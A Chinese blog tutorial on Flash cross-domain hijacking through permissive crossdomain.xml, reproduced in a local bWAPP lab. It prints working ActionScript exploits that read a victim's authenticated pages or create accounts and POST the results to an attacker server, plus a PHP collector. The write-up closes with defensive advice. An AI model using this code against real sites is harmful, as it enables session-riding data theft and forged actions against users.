初识flash跨域劫持漏洞

基础知识:


Flash(交互式矢量图和Web动画标准)是一种动画创作与应用程序开发于一身的创作软件。Adobe Flash Professional CC为创建数字动画、交互式Web站点、桌面应用程序以及手机应用程序开发提供了功能全面的创作和编辑环境。Flash广泛用于创建吸引人的应用程序,它们包含丰富的视频、声音、图形和动画。可以在Flash中创建原始内容或者从其它Adobe应用程序(如Photoshop或illustrator)导入它们,快速设计简单的动画,以及使用Adobe ActionScript 3.0开发高级的交互式项目。设计人员和开发人员可使用它来创建演示文稿、应用程序和其它允许用户交互的内容。Flash可以包含简单的动画、视频内容、复杂演示文稿和应用。

ActionScript(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的 ,最初是一种简单的脚本语言,现在最新版本ActionScript3.0,是一种完全的面向对象的编程语言,功能强大,类库丰富,语法类似JavaScript,多用于Flash互动性、娱乐性、实用性开发,网页制作和RIA(丰富互联网程序)开发。

目前,网上大多数Flash都是应用ActionScript2或ActionScript3来编写的。

编写个弹框的swf文件,编写test.as文件如下:
(Flash中可以使用ExternalInterface.call来执行JavaScript代码)

package
{
    import flash.display.Sprite;
    import flash.external.ExternalInterface;
       
    public class test extends Sprite
    {
        public function test()
        {
            ExternalInterface.call('alert(document.URL)');
        }
    }
}

利用mxmlc编译生成test.swf,并将它放置在web目录下进行访问:

Flash 调用与跨域:


Flash的调用和请求情形分别如下:

  1. HTML调用Flash时,Flash可以改后缀名;
  2. Flash可以单独访问,但是其效果类似于HTML调用同域的Flash,但是后缀必须是swf;
  3. Flash发动请求时,是根据Flash的域来判断的,而不是HTML来判断:
    (1)Flash请求同域资源时,直接忽视crossdomain.xml;
    (2)Flash请求外域资源时,受外域下crossdomain.xml里的策略限制;

自flash 10以后,如有跨域访问需求,必须在目标域的根目录下放置crossdomain.xml文件,且该根目录下的配置文件称为“主策略文件”。若不存在主策略文件,则该域将禁止任何第三方域的flash跨域请求。主策略文件对全站的跨域访问起控制作用,指明了远程 Flash 是否可以加载当前网站的资源(图片、网页内容、Flash等),也可以单独在某路径下放置仅对该路径及其子路径生效的crossdomain.xml配置文件,这需要在flash的AS脚本中使用如下语句来加载该配置文件:

Security.loadPolicyFile(“xxx.com/subdir/crossdomain.xml”)

flash在跨域时唯一的限制策略就是crossdomain.xml文件,该文件限制了flash是否可以跨域读写数据以及允许从什么地方跨域读写数据。位于.a.com域中的SWF文件要访问b.com的文件时,SWF首先会检查b.com服务器目录下是否有crossdomain.xml文件,如果没有,则访问不成功;若crossdomain.xml文件存在,且里边设置了允许a.com域访问,那么通信正常。所以要使Flash可以跨域传输数据,其关键就是crossdomain.xml。

  • HTML跨域加载Flash时的授权:

在HTML页面嵌入Flash时,其中的Object和Embed标签都有allowScriptAccess参数和allowNetworking参数,主要是用于在HTML页面调用执行Flash文件的场景。

allowScriptAccess:控制html页面与Flash页面的通讯。

always:html和Flash页面的通讯不做任何的限制;
samedomain:html和Flash同域的时候可以做通讯【这个值是默认值】;
never:html和Flash禁止通讯。

allowNetworking:控制Flash与外部的网络通讯。

all:Flash所有的网络API通讯接口都可用;
internal:navigateToURL,fscommand,ExternalInterface.call不可用;
none:所有的网络API不可用。

crossdomain.xml:


cross-domain-policycross-domain-policy元素是跨域策略文件crossdomain.xml的根元素。它只是一个策略定义的容器,没有自己的属性。子元素有:

  • site-control(确认是否可以允许加载其他策略文件)
  • allow-access-from(确认能够读取本域内容的flash文件来源域)
  • allow-access-from-identity(有特定证书的来源跨域访问本域上的资源)
  • allow-http-request-headers-from(授权第三方域flash向本域发送用户定义的http头)

常用的节点为allow-access-from,用来指明允许本域资源允许被哪些域名的Flash跨域请求。

漏洞利用:


这里我们利用bwapp靶场进行漏洞复现:
项目地址:https://github.com/nccgroup/CrossSiteContentHijacking
将源代码下载下来部署到本地,类型选择Flash。
浏览器需要支持Flash播放,这里利用Flash中心客户端自带的浏览器进行复现

输入Target Page后,点击Retrieve Contents,在下方可以看到成功读取到个人信息的secret内容。

通过抓包可以看到,首先会检查目标服务器根目录下是否有crossdomain.xml文件,确定允许当前域访问后,利用用户的登录凭证跨域传输数据:

真正的利用情境需要重新构造特定的恶意页面。就像CSRF需要构造一个页面诱导用户点击一样,Flash跨域也需要构造类似的情景。传统的CSRF是写入型的攻击,一般都是通过表单提交数据包,浏览器自动携带cookie,因为js是无法跨域的,这也是为什么CSRF只能进行写入操作。Flash跨域类似,也需要用户的登陆凭证才能访问敏感页面, 其中的不同点在于Flash脚本可以操作cookie发送表单,进而可以执行读取操作。

项目地址:https://github.com/OpenSecurityResearch/flash-xdomain-xploit
实现目标:当登录用户访问恶意服务器,利用Flash跨域获取用户的敏感信息并写入txt文件中
测试环境:192.168.151.110(恶意服务器)+ 192.168.107.156(目标服务器)+ BWAPP(web应用系统)

  • 编辑XDomainXploit.as文件,对于简单的get请求如下,只需要修改自己的victim URL和attacker URL
// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// XDomainXploit.as
// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "http://192.168.107.156/bwapp/secret.php";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://192.168.151.110/get_flash_data.php"
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
  • 使用mxmlc编译actionscript(注意要用32位的JDK):
mxmlc.exe XDomainXploit.as
  • 将xdx.html和编译生成的XDomainXploit.swf放置到本地web目录
  • 创建用来接受敏感信息的文件:
<?php
$data = file_get_contents("php://input");
$ret = file_put_contents('E:/phpstudy_pro/WWW/receive_flash_data.txt', 
$data, FILE_APPEND | LOCK_EX);
if($ret === false) { 
    die('Error writing to file');
}else { 
 echo "$ret bytes written to file";
}
?>
  • 欺骗登录用户访问恶意网站:
  • 成功获取用户的敏感信息并写入txt文件中:

除了获取敏感信息,还可以在目标站点上执行一些敏感操作,比如修改密码等:

  • post型:
// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// XDomainXploit.as
// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLRequestHeader;

    public class XDomainXploit_Post extends Sprite {
        public function XDomainXploit_Post() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "http://192.168.107.169/bwapp/user_extra.php";
            var header:URLRequestHeader = new URLRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.method = URLRequestMethod.POST;
            readRequest.data = "login=book4yi&email=test@test.com&password=asd12345&password_conf=asd12345&secret=99612345&action=create";
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            var sendTo:String = "http://192.168.151.109/get_flash_data.php"
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}

尝试在bwapp创建一个新用户:

成功创建并登录成功:

防御方法:


  • 当站点不需要跨域请求资源时,尽量删除crossdomain.xml文件;
  • 若需crossdomain.xml文件,则必须严格设置allow-access-from标签中domain的白名单

补充:


参考如下:


跨站数据劫持
前端跨域安全 - FreeBuf网络安全行业门户
crossdomain.xml文件配置不当利用手法
Flash型XSS总结 [ Mi1k7ea ]
Flash型CSRF总结 [ Mi1k7ea ]

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,386评论 6 479
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,939评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,851评论 0 341
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,953评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,971评论 5 369
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,784评论 1 283
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,126评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,765评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,148评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,744评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,858评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,479评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,080评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,053评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,278评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,245评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,590评论 2 343